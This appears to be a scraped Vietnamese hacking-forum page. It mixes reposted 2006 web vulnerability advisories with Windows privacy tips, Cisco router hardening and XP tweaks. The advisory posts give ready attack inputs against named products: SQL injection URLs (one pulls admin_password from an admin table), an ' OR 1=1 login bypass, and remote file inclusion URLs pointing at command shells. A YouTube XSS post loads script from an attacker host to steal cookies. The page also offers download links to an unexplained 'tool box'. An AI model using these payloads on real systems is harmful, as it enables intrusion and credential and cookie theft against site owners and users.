|
|
Lỗi như thế nào cũng không viết rõ ra, làm sao giúp được. Vui lòng edit lại nếu không topic sẽ move vào trash.
Thân
|
|
|
>> K.S Advisory
>> irc.gigachat.net #kurdhack
>> Thanx : Netqurd,Azad,B3g0k,Fearless,Milex,Flot,Zay_Boy,PH,KHA,KCA and other my friends
>> Version : All Version
Proof Of Concept :
+http://www.site.com/phpicalendar/rss/index.php?cal=[XSS]
Original Advisory :
http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-12-php-icalendar.html
|
|
|
Discovered By: CrAzY CrAcKeR
=====================
Example:
/modules.php?name=Sections&op=viewarticle&artid=[SQL]
|
|
|
Discovered By: CrAzY CrAcKeR
=====================
Example:
/gbrowse.php?cat_id=[SQL]
/rating.php?card_id=[SQL]
/create.php?card_id=[SQL]
/search.php?event_id=[SQL]
|
|
|
Ashop Search Module SQL injection
Code:
http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
credits: EntriKa & The_BeKiR & erne
|
|
|
Homepage:
http://www.youtube.com
Affected files:
* Search box input
* Adding a new blog:
- Blog name
XSS Vuln with cookie disclosure via search box:
Data isn't sanatized when using the search box. For PoC input:
<script src=http://www.youfucktard.com/xss.js></script>
PoC link:
+http://www.youtube.com/results?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E&search_type=search_videos&search=Search
Screenshots:
http://www.youfucktard.com/xsp/youtube1.jpg
XSS vuln via blog name input box:
Now, you tube allows you to add a blog to your profile, and one of the places they let you merge a blog is from blogspot.com. I auditing them a few days ago, and since you can use html in your blogs name amongst other things, this is dangerous for bringing it into youtube.
Screenshots:
http://www.youfucktard.com/xsp/youtube1.jpg
http://www.youfucktard.com/xsp/youtube2.jpg
http://www.youfucktard.com/xsp/youtube3.jpg
|
|
|
Download và dùng HJSplit để nhập file lại. Burn image file với Nero.
Chỉ dùng tool box này nếu bạn biết bạn đang làm gì.
http://rapidshare.de/files/17026169/ATB_DVD_V1.0.nrg.002
http://rapidshare.de/files/16579607/ATB_DVD_V1.0.nrg.024
http://rapidshare.de/files/16464437/ATB_DVD_V1.0.nrg.001
http://rapidshare.de/files/16466727/ATB_DVD_V1.0.nrg.042
http://rapidshare.de/files/16469541/ATB_DVD_V1.0.nrg.003
http://rapidshare.de/files/16472341/ATB_DVD_V1.0.nrg.004
http://rapidshare.de/files/16475169/ATB_DVD_V1.0.nrg.005
http://rapidshare.de/files/16478180/ATB_DVD_V1.0.nrg.006
http://rapidshare.de/files/16481173/ATB_DVD_V1.0.nrg.007
http://rapidshare.de/files/16484283/ATB_DVD_V1.0.nrg.008
http://rapidshare.de/files/16487715/ATB_DVD_V1.0.nrg.009
http://rapidshare.de/files/16491393/ATB_DVD_V1.0.nrg.010
http://rapidshare.de/files/16494923/ATB_DVD_V1.0.nrg.011
http://rapidshare.de/files/16501660/ATB_DVD_V1.0.nrg.030
http://rapidshare.de/files/16504421/ATB_DVD_V1.0.nrg.012
http://rapidshare.de/files/16506843/ATB_DVD_V1.0.nrg.013
http://rapidshare.de/files/16508922/ATB_DVD_V1.0.nrg.014
http://rapidshare.de/files/16510826/ATB_DVD_V1.0.nrg.015
http://rapidshare.de/files/16512566/ATB_DVD_V1.0.nrg.016
http://rapidshare.de/files/16556400/ATB_DVD_V1.0.nrg.017
http://rapidshare.de/files/16559538/ATB_DVD_V1.0.nrg.018
http://rapidshare.de/files/16562551/ATB_DVD_V1.0.nrg.019
http://rapidshare.de/files/16565855/ATB_DVD_V1.0.nrg.020
http://rapidshare.de/files/16569297/ATB_DVD_V1.0.nrg.021
http://rapidshare.de/files/16572685/ATB_DVD_V1.0.nrg.022
http://rapidshare.de/files/16576134/ATB_DVD_V1.0.nrg.023
http://rapidshare.de/files/16582959/ATB_DVD_V1.0.nrg.025
http://rapidshare.de/files/16585960/ATB_DVD_V1.0.nrg.026
http://rapidshare.de/files/16588869/ATB_DVD_V1.0.nrg.027
http://rapidshare.de/files/16591220/ATB_DVD_V1.0.nrg.028
http://rapidshare.de/files/16593379/ATB_DVD_V1.0.nrg.029
http://rapidshare.de/files/16624494/ATB_DVD_V1.0.nrg.041
http://rapidshare.de/files/16626930/ATB_DVD_V1.0.nrg.031
http://rapidshare.de/files/16629510/ATB_DVD_V1.0.nrg.032
http://rapidshare.de/files/16632189/ATB_DVD_V1.0.nrg.033
http://rapidshare.de/files/16634862/ATB_DVD_V1.0.nrg.034
http://rapidshare.de/files/16637658/ATB_DVD_V1.0.nrg.035
http://rapidshare.de/files/16640449/ATB_DVD_V1.0.nrg.036
http://rapidshare.de/files/16643474/ATB_DVD_V1.0.nrg.037
http://rapidshare.de/files/16646450/ATB_DVD_V1.0.nrg.038
http://rapidshare.de/files/16649463/ATB_DVD_V1.0.nrg.039
http://rapidshare.de/files/16652740/ATB_DVD_V1.0.nrg.040
|
|
|
Andys Chat 4.5 (action) Remote File Inclusion
Credit : SpC-x
Site : http://wWw.SaVSaK.CoM
Greetz :
| Liz0ziM | Ejder | FasTBoY | The_BeKiR | Nukedx |
Remote File Inclusion :
http://www.victim.net/[path]/register.PHP?action=[CMD-Script]
/SpC-x
|
|
|
HotPlugCMS doesn't check input field values, so logging in on /hotplugcms/administration/tblcontent is very easy with
' OR 1=1 /*
and a SQL-inject will bypass the entire authentication process.
Typical, very simple SQL Injection.
peda
|
|
|
Vendor: APBoard from APP
Homepage: www.php-programs.de
Vulnerabilities
board.php?id=1&sessid=[SID]&PHPSESSID=[SQL] ##
main.php?viewcat=1&viewcatmod=[SQL]&sessid=[SID] ##
Contact: 666hell.de.tk
|
|
|
-----------------------------------------------------
Advisory id: FSA:015
Author: Federico Fazzi
Date: 14/06/2006, 18:20
Sinthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
Type: high
Product: http://phpbluedragon.net/
Patch: unavailable
-----------------------------------------------------
1) Description:
Error occured in template.php, line 23:
---
require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php");
---
2) Proof of concept:
Code:
http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/
(note this is with final slash (/))
3) Solution:
sanitized $vsDragonRootPath
|
|
|
Description:
A query like "select str_to_date( 1, NULL );" crashes mysqld.
Unaffected versions:
*>= 4.1.18
*>= 5.0.19
*>= 5.1.6
For more details:
http://bugs.mysql.com/bug.php?id=15828
--
Kanatoko<anviljumperz.net>
|
|
|
###############################################
# bbrss PhpBB (phpbb_root_path) Remote File Inclusion
###############################################
# Credit : SpC-x | The_BeKiR
# Site : http://wWw.SaVSaK.CoM
###############################################
# Greetz :
# | The_BeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x |
###############################################
Remote File Inclusion:
http://www.target.com/path/bbrss.php?phpbb_root_path=Command*Shell
Bbrss.PHP :
define('IN_PHPBB', true); // to ensure your script works ! //
$phpbb_root_path = './';
include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.php');
|
|
|
Khi chúng ta ngồi dạo net MỘT MÌNH thì ai cũng nghĩ rằng làm sao thông tin cá nhân của mình tiết lộ ra ngoài được nhỉ khi chỉ cần xóa history và cookie. Nhưng việc suy nghĩ như vậy là hoàn toàn sai lầm. Vì Windows có vài đặc tính log tất cả mọi thứ lại ngay khi bạn đã delete. Chúng ta sẽ đi vào thảo luận vấn đề này ở đây.
Đầu tiên là bạn delete history bằng phương pháp thông dụng là vào Tools>Internet Options>Clear History. Sau đó vào thư mục C:\windows\cookies (đối với windows 98, còn những win khác thì vào C:\Documents and Settings\Administrator\Cookies). Trong thư mục cookies ta sẽ thấy file "index.dat". Bạn có bao giờ tự hỏi rằng file này để làm gì vậy không? Bạn đã từng thử mở nó bằng notepad chưa? Ngay cả khi bạn cố gắng thử delete nó lần nào chưa? Có lẽ câu trả lời là "NO" Bây giờ chúng ta thử xem sao. Mở nó bằng notepad và....bạn sẽ ngạc nhiên khi gặp thông báo là "this file cannot be opened as it is being used by another application". Ok không có vấn đề gì. Copy file này đến một chỗ khác. Bây giờ hãy mở nó bằng notepad. Chắc bạn sẽ rất ngạc nhiên khi thấy tất cả những url mà mình đã vào. Và tiếp theo bạn sẽ làm gì đây. Xóa nó à? Bằng cách nào? Windows không cho phép làm điều đó. Chỉ có 1 cách là bạn phải khởi động lại máy và vào DOS để xóa file đó:
C:\windows> cd cookies [Enter]
C:\windows\cookies> del index.dat [Enter]
Khi ta khởi động vào lại win thì sẽ có 1 file index.dat mới, sạch sẽ được thay thế vào .
Cache Folder
=========
Vẫn chưa an toàn!!! Người ta vẫn còn cách khác là mở thư mục Cache. Phần lớn thư mục này nằm ở "C:\windows\temporary internet files". Khi vô đây, ta sẽ bắt gặp rất nhiều file. Bất cứ khi nào bạn mở một trang web, nó sẽ cất giữ lại ở thư mục này. Và giúp bạn xem nó khi offline. Nhưng những file này thật sự không có thật, chúng chỉ là những link hay shortcut. Còn những file có thực thì lại được cất giấu vào sâu trong các thư mục hệ thống như BT7VHTOX,C52R4X6B,CDIJKLIJ và nhiều ở folder "C:\WINDOWS\Temporary Internet Files\Content.IE5". Và ở đây lại xuất hiện một vấn đề. Bạn không thể xem Content.IE5 trong thư mục Cache. Lý do vì đó là thư mục hệ thống. Để hiểu hơn về thư mục Cache bạn phải làm việc ở môi trường DOS. Ở dấu nhắc DOS, gõ
C:\windows> cd tempor~1 [Enter]
C:\windows\temporary internet files>dir/as [Enter]
Volume in drive C is WIN
Volume Serial Number is 0E4A-1109
Directory of C:\WINDOWS\Temporary Internet Files
DESKTOP INI 67 11-13-02 9:29p desktop.ini
CONTENT IE5 <DIR> 11-09-02 11:34a Content.IE5
1 file(s) 67 bytes
1 dir(s) 8,392.13 MB free
C:\windows\temporary internet files>
lệnh "dir" với '/a' sẽ làm cho hệ thống hiển thị tất cả các loại file dù đó là file ẩn, hệ thống hay những loại khác. Và dùng nó như '/as' sẽ hiển thị tất cả file, thư mục hệ thống. Vì thế chúng ta sẽ lấy được một file desktop.ini và một thư mục content.ie5. Đi vào lại thư mục content.ie5
C:\windows\temporary internet files>cd content.ie5 [Enter]
C:\windows\temporary internet files\content.ie5>dir/as [Enter]
Volume in drive C is WIN
Volume Serial Number is 0E4A-1109
Directory of C:\WINDOWS\Temporary Internet Files\Content.IE5
DESKTOP INI 67 11-09-02 11:34a desktop.ini
U3SR4MU7 <DIR> 11-09-02 11:34a U3SR4MU7
S52BS1IN <DIR> 11-09-02 11:34a S52BS1IN
CDIJKLIJ <DIR> 11-09-02 11:34a CDIJKLIJ
BT7VHTOX <DIR> 11-09-02 11:34a BT7VHTOX
O5QF8XYZ <DIR> 11-25-02 3:44p O5QF8XYZ
Z3J5HAMP <DIR> 11-25-02 3:44p Z3J5HAMP
C52R4X6B <DIR> 11-25-02 3:44p C52R4X6B
CHEBGTEF <DIR> 11-25-02 3:44p CHEBGTEF
1 file(s) 67 bytes
8 dir(s) 8,384.13 MB free
Ở đây ta thấy được 8 thư mục hệ thống. Và những file thực mà bạn đã thấy trong thư mục Tempor~1 đều được cất giữ ở 8 thư mục hệ thống này. Thực tế Tempor~1 chỉ chứa một file desktop.ini và một thư mục Content.ie5. ( Tôi không hiểu tại sao những người lập trình windows tạo ra cái thư mục cache rắc rối này để làm gì nhỉ !!)
Clearing Cache
==========
Và có thể bạn sẽ rất ngạc nhiên khi biết rằng thư mục cache này chiếm dung lượng rất nhiều, có khi hơn 40MB !! Vì thế hãy clear nó đi. Cách đơn giản nhất là nhấn chuột phải vào ổ đĩa C:\ trong My Computer. Chọn properties. Và nhấn "Disk Cleanup". Nhớ đánh dấu vào "Temporary Internet Files" và nhấn OK. Bây giờ thư mục cache đã hoàn toàn xóa sạch ngoại trừ cookie.
Tính năng hoàn toàn tự động
===================
Thật sự history vẫn chưa được xóa sạch !!! Có những lúc bạn chỉ cần gõ www.s thì ở thanh address sẽ cho bạn một danh sách url mà bắt đầu bằng www.s . Vì vậy nếu bạn đã vào www.somesite.com trước va sau đó một ai muốn vào trang www.site.com , chỉ cần gõ www.n sẽ phát hiện ra trang www.somesite.com !! Đó là một trong những đặc điểm hoàn toàn tự động của windows. Và đôi khi lại rất nguy hiểm đối với bạn Windows cất giữ những URLs này trong thư mục cookies C:\windows\cookies . Hãy xóa những cookie này đi. Ví dụ. nếu tên của trang web là website.com thì tên cookie của site đó sẽ là [email]anyuser@website.com.txt[/email].
Những file history của Office
===================
Trong số chúng ta chắc ai cũng biết khi mở bất kỳ tài liệu nào sau đó nhấn vào menu file thì sẽ thấy được danh sách những file doc gần đây được mở. Ở đây có thể có những file rất quan trọng. Search trên máy của tôi và biết chúng được cất giữ ở thư mục C:\WINDOWS\Application Data\Microsoft\Office\Recent. Thư mục này chứa những shortcut của các file excel, access, ppt, html gần đây được mở ra và ngay cả những thư mục để chứa các file đó nữa. Có một file đặc biệt là index.dat, nó chứa toàn bộ danh sách. Vì vậy nếu bạn không muốn ai biết được tài liệu đó thì nên xóa những file trong thư mục này.
Registry
======
1. wordpad recentfiles
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List"
2. Recent documents
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
3. recent run mrus
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
4. Shell folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
5. Doc find mrus
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU
6. days to keep history
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
7. telnet history
HKEY_CURRENT_USER\Software\Microsoft\Telnet
8. windows media player history
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentURLList
|
|
|
Trong Control-panel:
"Administrative Tools":
Chọn:
Local Security Policy
Chọn cây bên trái: Security Settings / Local Policies / User Rights Assignment:
"policies" là permissions, mà được gán cho Usergroups (cũng có thể là một usernames riêng).
Nhấp đôi lên một policy/permission để hiển thị danh sách usergroups, mà đã có permission này rồi.
Chú ý: tất cả users đã tạo trong User Management thì tự động là member của Usergroup "Everyone"
Để thêm một usergroup, dùng nút "Add User or Group..."
Để tìm một usergroups hay users, chọn "Advanced"
Dùng nút "Find Now" để hiển thị danh sách Users và UserGroups, sau đó chọn để gán permission vào.
Local Security Policies cũng định ra vài quy tắc cho việc sử dụng mật khẩu:
Theo mặc định, users sẽ được yêu cầu để thay đổi mật khẩu 42 ngày 1 lần (trừ khi bạn chọn mật khẩu "never expire" trong User management).
Nhấp đôi vào để thay đổi giá trị.
Bạn có thể thay đổi mật khẩu theo ngày mình chọn (cao nhất là 999).
Nếu bạn muốn tránh mật khẩu thay đổi thì chọn giá trị là 0.
Về bảo mật của policies cũng nằm trong hệ thống, nếu ai đó nhập sai mật khẩu vài lần hoặc cố tình dò thì tốt hơn nên chọn thêm chức năng này:
|
|
|
1- Điều khiển việc truy cập đến router của bạn
Việc đầu tiên là áp dụng vài quy tắc để hạn chế tất cả việc truy cập từ bên ngoài đến một số cổng của router. Bạn có thể khóa tất cả cổng, nhưng điều đó không cần thiết. Những lệnh bên dưới sẽ bảo vệ router của bạn chống lại vài cuộc tấn công thăm dò và, tất nhiên, sẽ hạn chế việc truy cập đến những cổng đó:
access-list 110 deny tcp any host $yourRouterIP eq 7
access-list 110 deny tcp any host $yourRouterIP eq 9
access-list 110 deny tcp any host $yourRouterIP eq 13
access-list 110 deny tcp any host $yourRouterIP eq 19
access-list 110 deny tcp any host $yourRouterIP eq 23
access-list 110 deny tcp any host $yourRouterIP eq 79
int x0/0
access-group in 110
Ở đây $yourRouterIP là IP router của bạn và x0/0 là external interface của bạn. Chúng ta sẽ dùng nó trong cả bài này.
2- Hạn chế việc truy cập bằng telnet
Telnet không phải là giao thức an toàn để dùng, nhưng nếu thực sự bạn muốn dùng nó (nên dùng ssh thì tốt hơn) thì hạn chế tất cả việc truy cập đến nó (nên nhớ rằng việc truyền thông tin sẽ không được mã hóa). Cách tốt nhất để làm là dùng lệnh access-list và access-class.
access-list 50 permit 192.168.1.1
access-list 50 deny any log
line vty 0 4
access-class 50 in
exec-timeout 5 0
Ở đây 192.168.1.1 là địa chỉ IP cho phép telnet đến router
3- Block những gói tin xấu
Bạn không bao giờ cho phép những IP loopback/reserve từ Internet đến external interface và bạn có thể từ chối broadcast và địa chỉ multicast.
access-list 111 deny ip 127.0.0.0 0.255.255.255 any
access-list 111 deny ip 192.168.0.0 0.0.0.255 any
access-list 111 deny ip 172.16.0.0 0.0.255.255 any
access-list 111 deny ip 10.0.0.0 0.255.255.255 any
access-list 111 deny ip host 0.0.0.0 any
access-list 111 deny ip 224.0.0.0 31.255.255.255 any
access-list 111 deny icmp any any wwwect
int x0/0
access-group in 111
4- Hạn chế SNMP
SNMP phải luôn luôn hạn chế, trừ khi bạn muốn mọi người lấy thông tin của mình trên mạng.
access-list 112 deny udp any any eq snmp
access-list 112 permit ip any any
interface x0/0
access-group 112 in
Và nếu bạn không định dùng SNMP thì vô hiệu hóa nó luôn:
no snmp-server
5- Mã hóa tất cả mật khẩu
Một điều rất quan trọng để bảo vệ tất cả mật khẩu của bạn là dùng thuật toán mạnh nhất nếu có thể. Mật khẩu từ chế độ exec được cấp quyền truy cập đến hệ thống IOS. Có thể dùng MD5, hiện giờ mạnh nhất trong Cisco IOS.
enable secret $yourpassword
Lệnh dùng để mã hóa tất cả mật khẩu hiện thời trong hệ thống là
service password-encryption
6- Vô hiệu hóa tất cả những dịch vụ không dùng đến
6.1 – Disable Echo, Chargen và discard
no service tcp-small-servers
no service udp-small-servers
6.2 – Disable finger
no service finger
6.3 – Disable httpd interface
no ip http server
6.4 - Disable ntp (nếu không dùng)
ntp disable
7- Thêm vài tùy chọn bảo mật
7.1 – Disable source routing
no ip source-route
7.2 - Disable Proxy Arp
no ip proxy-arp
7.3 - Disable ICMP wwwects
interface s0/0 (external interface của bạn)
no ip wwwects
7.4 - Disable Multicast route Caching
interface s0/0 (external interface của bạn)
no ip mroute-cache
7.5 - Disable CDP
no cdp run
7.6 - Disable direct broadcast (protect against Smurf attacks)
no ip directed-broadcast
8- Ghi lại mọi thứ (Log)
Để kết thúc, bạn phải ghi lại mọi thứ trên một Log Server bên ngoài. Bạn phải theo dõi thường xuyên hệ thống và luôn phân tích file log.
logging trap debugging
logging 192.168.1.10
Ở đây 192.168.1.10 là ip của log server (cấu hình như một Syslog server)
Tóm lại
Với những bước như trên bạn có thể bảo vệ cho router chống lại những cuộc tấn công và tăng khả năng bảo mật cho mình.
Ở đây có một ví dụ, bạn có thể thấy kết quả của nmap trước và sau khi áp dụng những cách trên:
Trước:
bash-2.05b# nmap -O 192.168.1.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.1.1):
Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
19/tcp open chargen
23/tcp open telnet
79/tcp open finger
80/tcp open http
Remote OS guesses: AS5200, Cisco 2501/5260/5300 terminal server IOS 11.3.6(T1),
Cisco IOS 11.3 - 12.0(11)
Sau:
bash-2.05b# nmap -P0 -O 192.168.1.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Warning: OS detection will be MUCH less reliable because we did not find at least 1
open and 1 closed TCP port
All 1601 scanned ports on (192.168.1.1) are: filtered
Too many fingerprints match this host for me to give an accurate OS guess
Nmap run completed -- 1 IP address (1 host up) scanned in 403 seconds
|
|
|
Test ở Win XP, 98, Me
Đôi khi bạn muốn giấu tài liệu hay những dữ liệu quan trọng thì thường là dùng những soft như Folder Lock,... nhưng nếu lỡ máy đó bị dính keylogger thì việc tìm ra password chỉ là việc đơn giản mà thôi.
Ở đây tôi sẽ chỉ cho các bạn cách giấu thư mục hay những tài liệu mà không cần đến bất cứ phần mềm nào cả!
Bây giờ vào Run ---> Regedit ---> HKEY_CLASSES_ROOT/CLSID
Bạn sẽ thấy một list giá trị. Tiếp theo ở trên thanh toolbar chọn edit ---> Find , và tìm tên thư mục bạn muốn biến đổi thành. Ví dụ bạn muốn làm cho thư mục Test của mình giống như thư mục My Computer thì ở chỗ Find, bạn nhập My Computer vào và sau đó nhìn xuống dưới góc bên trái màn hình ta sẽ thấy
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
ok ta đã đi được 1 nửa chặng đường
Bây giờ bạn đã biết được giá trị CLSID của My Computer. Sau đó đi đến thư mục bạn muốn giấu, right-click và RENAME
Chọn cho nó 1 cái tên và tiếp theo là dấu "." (không có ") rồi copy tên key mà bạn đã thấy trong registry. Như cái của tôi sẽ rename lại là:
Test.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Rồi nhấn Enter ! Lúc này bạn sẽ thấy thư mục Test có biểu tượng giống như My Computer và nhấn vào đó thì bạn sẽ biết . Còn khi nào muốn vào thư mục đó thì chỉ cần rename lại ở dos (hoặc là vào Run ---> cmd). Ví dụ:
C:\>ren Test.{20D04FE0-3AEA-1069-A2D8-08002B30309D} Test
Lúc này thì bạn có thể vào lại thư mục của mình.
Ngoài ra bạn có thể tạo biểu tượng giống như CONTROL PANEL, MY NEWORK
PLACES, MY DOCUMENTS, etc
Recycle Bin- {5ef4af3a-f726-11d0-b8a2-00c04fc309a4}
My Computer- {20D04FE0-3AEA-1069-A2D8-08002B30309D}
Control Panel- {3FC0B520-68A9-11D0-8D77-00C04FD70822}
History- {00BB2764-6A77-11D0-A535-00C04FD7D062}
Printers- {2227A280-3AEA-1069-A2DE-08002B30309D}
|
|
|
1.Tắt màn hình khởi động của Windows XP
Cách làm này để tăng tốc độ khởi động của Windows.
Mở file boot.ini.
Thêm " /noguiboot" sau "/fastdetect" (không có dấu “).
Lúc khởi động lại, màn hình khởi động sẽ không xuất hiện. Có thể kích hoạt lại màn hình khởi động bằng việc xoá dòng đã thêm.
2.Turn Off Indexing để tăng tốc XP
Windows XP giữ một record của tất cả file trên đĩa cứng để mỗi khi bạn tìm kiếm nhanh hơn. Nhưng nếu như bạn tìm kiếm thường xuyên sẽ làm record đó nặng thêm, lúc ấy open, close file sẽ không còn nhanh nữa. Đây là cách tắt chức năng đó:
Mở My Computer.
Right-click vào biểu tượng ổ cứng chọn Properties.
Ở dưới cùng cửa sổ bạn sẽ thấy "Allow indexing service to index this disk for faster searches," bỏ cái đánh dấu đó đi và nhấn OK.
Một cửa sổ mới sẽ popup lên và chọn Apply to all folders and subfolders.
3.Xoá Prefetch để nâng cao sự thực thi
Đây là một kỹ thuật độc nhất chỉ có ở WinXP. Ta biết rằng đây là cách lọc sạch những file registry và TEMP cho Win9X/ME/2000 một cách định kỳ. Prefetch là một kỹ thuật mới và hữu ích ở Windows XP. Tuy nhiên, sau khi dùng XP vài lần, thư mục prefetch chứa đầy những tập tin không cần thiết nữa, mà có thể làm chậm máy tính của bạn.
Mở C(ổ đĩa hệ thống):/windows/prefetch, xoá những file trong đó rồi khởi động lại. Bạn nên làm việc này hàng tháng.
4.Tăng tốc độ thực thi qua My Computer
Start > nhấn chuột phải vào My Computer và chọn Properties.
Nhấn thẻ "Advanced".
Nhấn Setting ở chỗ "Performance".
Tiếp theo bỏ đánh dấu những cái sau:
Fade or slide menus into view
Fade or slide ToolTips into view
Fade out menu items after clicking
Show Shadows under menus
Slide open combo boxes
Slide taskbar buttons
Use a background image for each folder type
Use common tasks in folders
Bây giờ Windows sẽ vẫn tốt và thực hiện nhanh hơn.
5.Giảm 10 giây chờ của Scandisk
Mở MS Dos Prompt (Start -> Run -> gõ CMD), và gõ: CHKNTFS /T:4 (số 4 là thời gian chờ (giây)).
Bạn có thể gõ CHKNTFS /? để hiểu rõ hơn về lệnh này.
6.Chế độ DMA ở thiết bị IDE
Giống như Windows 2000, Windows XP vẫn quên set chế độ DMA chính xác cho thiết bị IDE designated as the slaves on IDE chính và secondary IDE channels. Hầu hết CD-ROMS có khả năng hỗ trợ chế độ DMA, nhưng theo mặc định ở XP thì vẫn là PIO. Set nó sang DMA không làm cho CD-ROM nhanh hơn, nhưng sẽ giảm chu trình của CPU. Đây là cách làm:
Nhấn chuột phải vào "My Computer", chọn Properties -> thẻ Hardware, và chọn Device Manager.
Mở rộng "IDE ATA/ATAPI Controllers" và nhấp đôi vào "Primary IDE Channel".
Dưới thẻ "Advanced Settings", kiểm tra "Device 1". Set nó thành "DMA if available".
Lặp lại bước trên cho "Secondary IDE Channel" nếu bạn có thiết bị đính kèm với nó. Khởi động lại.
7.Load Internet Explorer nhanh hơn
Sửa link trong Internet Explorer thành -nohome sau nó. Ví dụ: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome
Nó sẽ load internet explorer rất nhanh bởi vì nó không load một trang web trong khi mở ra. Nếu bạn muốn đến trang chủ sau khi load, chỉ cần nhấn nút Home.
8.Cách đơn giản để điều chỉnh LargeSystemCache
Thông thường, thủ thuật sẽ là HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management và đổi giá trị sang O hay 1 để chỉnh lại cho đúng LargeSystemCache.
Tuy nhiên ở Windows XP, ta làm như sau:
Nhấn chuột phải vào My Computer.
Chọn Properties. Nhấn Advanced. Nhấn Setting trong Performance.
Nhấn Advanced một lần nữa.
Chọn Programs hay System Cache ở dưới Memory Usage.
9.Tắt Windows XP nhanh hơn
Giống như những phiên bản trước của windows, nó mất một thời gian dài để restart hay shutdown windows XP khi có thêm âm thanh "Exit Windows". Để giải quyết vấn đề này bạn phải bỏ âm thanh đó đi.
Nhấn nút Start -> Control Panel -> Sounds and Audio Devices -> Sounds.
Dưới program events và windows, nhấn "Exit Windows". Bây giờ ở chỗ sounds bạn chọn "none" và nhấn Apply và OK.
10.Dễ dàng vô hiệu hóa Messenger
Đến thư mục: C:/Program Files/Messenger. Đổi tên danh mục Messenger thành "MessengerOFF".
11.Tắt Autoplay cho đĩa Chương Trình CDs
Nhấn Start, nhấn Run, gõ GPEDIT.MSC để mở Group Policy trong Microsoft Management Console.
Nhấp đôi vào Computer Configuration, nhấp đôi Administrative Templates, nhấp đôi System, và sau đó nhấn Turn off Autoplay.
Hướng dẫn nơi màn hình sẽ chỉ bạn cách điều chỉnh nó. Nhấn Properties để hiển thị bảng setting.
Nhấn Enabled, và chọn ổ đĩa CD-ROM, sau đó nhấn OK để tắt chức năng CD Autoplay.
Việc này không ảnh hưởng đến Autoplay cho đĩa CDs nhạc.
12.Đồng bộ Đồng hồ ở máy bạn với thời gian trên mạng
Nhấp đôi vào chỗ thời gian ở thanh task bar.
Nhấn thẻ Internet Time.
Chọn thời gian của server mà bạn muốn dùng và nhớ đánh dấu vào Automatically synchronize with an Internet time
13.Win XP không Shutdown hoàn toàn được
Mở Control Panel, và vào Power Options.
Nhấn thẻ APM, sau đó đánh dấu "Enable Advanced Power Management support."
Shut down máy của bạn. Giờ thì ok.
15.Tắt thông báo lỗi (Error Reporting)
Mở Control Panel.
Nhấn vào Performance and Maintenance.
Nhấn System.
Sau đó nhấn thẻ Advanced.
Nhấn lên nút error-reporting ở dưới cửa sổ.
Chọn Disable error reporting.
Nhấn OK. Nhấn OK.
16.Tăng tốc độ cho Cable Modem hoặc DSL ở XP
Ở Properties của "My Network Places", chọn kết nối sau đó ở thanh menu chọn "Advanced" rồi "Advanced Settings". Bỏ đánh dấu ở 2 ô phía dưới:
File and Printer sharing và Client for MS networks. Nhấn OK.
17.Dừng Jerkey Graphics
Nếu bạn kết nối đến một mạng LAN và có vài vấn đề với jerkey graphics, đây là cách giải quyết:
Nhấn chuột phải vào "MyComputer".
Chọn "Manage".
Nhấn "Device Manager".
Nhấp đôi vào your NIC dưới "Network Adapters".
Ở cửa sổ mới, chọn thẻ "Advanced".
Chọn "Connection Type" và set giá trị NIC của bạn.
Nên khởi động máy lại.
18.Tắt chức năng System Restore để tăng dung lượng đĩa cứng.
Mặc định, Windows XP giữ bản sao lưu của file hệ thống trong thư mục System Volume Information. Nó làm tốn dung lượng ổ đĩa cứng. Nếu bạn không muốn Windows sao lưu những file hệ thống thì:
Mở Control Panel.
Nhấp đôi System.
Nhấn vào thẻ System Restore.
Chọn "Turn off System Restore on all drives".
Nhấn Apply.
Bây giờ bạn có thể xoá thư mục System Volume Information
|
|
|
Ai cũng thấy rằng password dùng để login vào windows dễ dàng bị vô hiệu hoá. Và điều đó thật là nguy hiểm nếu ai đó có quyền truy cập vật lý vào hệ thống của chúng ta. Đặc biệt là những máy dùng ở công cộng. Và đây là một cách bảo vệ. Ta biết rằng "c:\Autoexec.bat" luôn được thi hành bất cứ khi nào windows khởi động. Vì thế chỉ cần tạo một chương trình C đơn giản để lấy password từ user và kiểm tra nó với password đã định trước đây. Bây giờ tạo một file thực thi và đưa đường dẫn của file .exe lên dòng đầu tiên trong "Autoexec.bat".
Ví dụ file của ta là pass.exe trong thư mục C:\tc sau đó thêm dòng "C:\tc\pass.exe" (không có “) trong file "autoexec.bat".
Đừng lo lắng ngay cả khi Ctr+C hay Ctr+Brk không hoạt động. Code C như sau:
Code:
#include<stdio.h>
#include<conio.h>
void main()
{
char str[4];
char passwd[4]="helo"; /* Set password của bạn */
int i;
clrscr();
loop:
printf("\nEnter password:");
for(i=0;i<4;i++)
{
str[i]=getch(); /* Đừng dùng scanf lên đây nếu không muốn hiển thị bất cứ thứ gì ta đã gõ */
}
for(i=0;i<4;i++)
{ if(str[i]==passwd[i])
continue;
else goto loop;
}
}
